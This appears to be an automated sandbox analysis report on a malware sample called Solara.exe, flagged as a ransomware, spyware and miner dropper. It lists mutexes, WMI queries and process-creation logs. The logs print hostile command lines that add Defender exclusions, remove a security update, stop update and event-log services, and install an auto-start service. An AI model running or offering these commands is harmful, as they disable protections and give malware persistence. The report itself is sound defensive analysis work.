                Source: sqlite3.dll.76.drStatic PE information: Section: UPX1 ZLIB complexity 0.9974986001493175
                Source: unicodedata.pyd.76.drStatic PE information: Section: UPX1 ZLIB complexity 0.9949597928113553
                Source: classification engineClassification label: mal100.rans.troj.adwa.spyw.evad.mine.winEXE@155/141@5/7
                Source: C:\Users\user\Desktop\Solara.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Solara.exe.logJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4052:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7024:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6904:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5836:120:WilError_03
                Source: C:\Users\user\Desktop\Solara.exeMutant created: \Sessions\1\BaseNamedObjects\iSwokMxIl2hScyvQj
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeMutant created: \Sessions\1\BaseNamedObjects\E
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2848:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:336:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4008:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1512:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4864:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5908:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1660:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3700:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1496:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Global\qdpnprrzvlcxaaqg
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5688:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4704:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4732:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5920:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1832:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6136:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4908:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5436:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7088:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6000:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3040:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3956:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1368:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5576:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5528:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2040:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5452:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5572:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6380:120:WilError_03
                Source: C:\Users\user\Desktop\Solara.exeFile created: C:\Users\user\AppData\Local\Temp\Solara.exeJump to behavior
                Source: Solara.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Solara.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Users\user\Desktop\Solara.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Solara.exeReversingLabs: Detection: 71%
                Source: Exela.exeString found in binary or memory: --help
                Source: Exela.exeString found in binary or memory: --help
                Source: Exela.exeString found in binary or memory: can't send non-None value to a just-started generator
                Source: Exela.exeString found in binary or memory: id-cmc-addExtensions
                Source: Exela.exeString found in binary or memory: set-addPolicy
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeFile read: C:\Users\user\AppData\Local\Temp\Solara.exeJump to behavior
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                Source: unknownProcess created: C:\Users\user\Desktop\Solara.exe "C:\Users\user\Desktop\Solara.exe"
                Source: C:\Users\user\Desktop\Solara.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe'
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Solara.exeProcess created: C:\Users\user\AppData\Local\Temp\Solara.exe "C:\Users\user~1\AppData\Local\Temp\Solara.exe"
                Source: C:\Users\user\Desktop\Solara.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Exela.exe'
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "PGYNROQK"
                Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "PGYNROQK" binpath= "C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe" start= "auto"
                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "PGYNROQK"
                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
                Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeProcess created: C:\Windows\System32\conhost.exe conhost.exe
                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Solara.exe "C:\Users\user\AppData\Local\Temp\Solara.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Solara.exe "C:\Users\user\AppData\Local\Temp\Solara.exe"
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Solara.exe "C:\Users\user\AppData\Local\Temp\Solara.exe"
                Source: C:\Users\user\Desktop\Solara.exeProcess created: C:\Users\user\AppData\Local\Temp\Exela.exe "C:\Users\user~1\AppData\Local\Temp\Exela.exe"
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeProcess created: C:\Users\user\AppData\Local\Temp\Exela.exe "C:\Users\user~1\AppData\Local\Temp\Exela.exe"
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\Conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Solara.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\Conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe'Jump to behavior
                Source: C:\Users\user\Desktop\Solara.exeProcess created: C:\Users\user\AppData\Local\Temp\Solara.exe "C:\Users\user~1\AppData\Local\Temp\Solara.exe" Jump to behavior
                Source: C:\Users\user\Desktop\Solara.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Exela.exe'Jump to behavior
                Source: C:\Users\user\Desktop\Solara.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "PGYNROQK"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "PGYNROQK" binpath= "C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe" start= "auto"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "PGYNROQK"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeProcess created: C:\Windows\System32\conhost.exe conhost.exe
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\Solara.exe" -Verb runAs
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeProcess created: C:\Users\user\AppData\Local\Temp\Exela.exe "C:\Users\user~1\AppData\Local\Temp\Exela.exe"
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeProcess created: unknown unknown
